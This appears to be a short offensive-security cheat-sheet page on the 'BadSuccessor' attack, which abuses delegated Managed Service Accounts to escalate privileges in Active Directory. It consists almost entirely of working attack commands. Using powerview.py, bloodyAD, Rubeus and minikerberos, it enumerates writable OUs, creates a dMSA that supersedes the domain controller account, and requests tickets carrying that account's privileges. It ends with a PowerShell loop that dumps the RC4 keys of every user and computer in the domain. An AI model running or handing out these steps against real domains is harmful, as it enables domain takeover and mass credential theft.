TwitterGitHubBlog

BadSuccessor

Abusing dMSA to Escalate Privileges in Active Directory

Enumerate OUs where we can create child objects (using powerview.py or bloodyAD):

PV > Get-DomainObjectAcl -LDAPFilter "(objectClass=organizationalUnit)" -Where "ActiveDirectoryRights contains CreateChild"
$ bloodyAD -d megacorp.local -k --host DC01.megacorp.local --dc-ip 192.168.1.11 --dns 192.168.1.11 [--gc 192.168.1.11] [-s] get writable --otype OU [--right CHILD]

Create a dMSA account with a superseded account in the msDS-ManagedAccountPrecededByLink property (using powerview.py or bloodyAD):

PV > Add-DomainDMSA -Identity mydmsa -PrincipalsAllowedToRetrieveManagedPassword jdoe -SupersededAccount DC01 [-BaseDN "CN=Managed Service Accounts,DC=megacorp,DC=local"]
$ bloodyAD -d megacorp.local -k --host DC01.megacorp.local --dc-ip 192.168.1.11 --dns 192.168.1.11 [--gc 192.168.1.11] [-s] add badSuccessor mydmsa -t "CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local" [--ou "CN=Managed Service Accounts,DC=megacorp,DC=local"]

Ask for a TGT containing the superseded account PAC (using Rubeus or minikerberos-getDmsa):

Cmd > Rubeus.exe asktgs /targetuser:mydmsa$ /service:krbtgt/megacorp.local /dmsa /opsec /nowrap /ticket:<JDOE_TGT>
$ python3 minikerberos/examples/getDmsa.py 'kerberos+ccache://megacorp.local\jdoe:[email protected]' '[email protected]' --ccache /tmp/mydmsa.ccache

Request TGT and grep for "previous keys" (from KERB-DMSA-KEY-PACKAGE structure), which is actually current RC4 of the superseded account, for all domain users and computers in a loop (requires this Rubeus):

$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
        + @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}

Tools

Last updated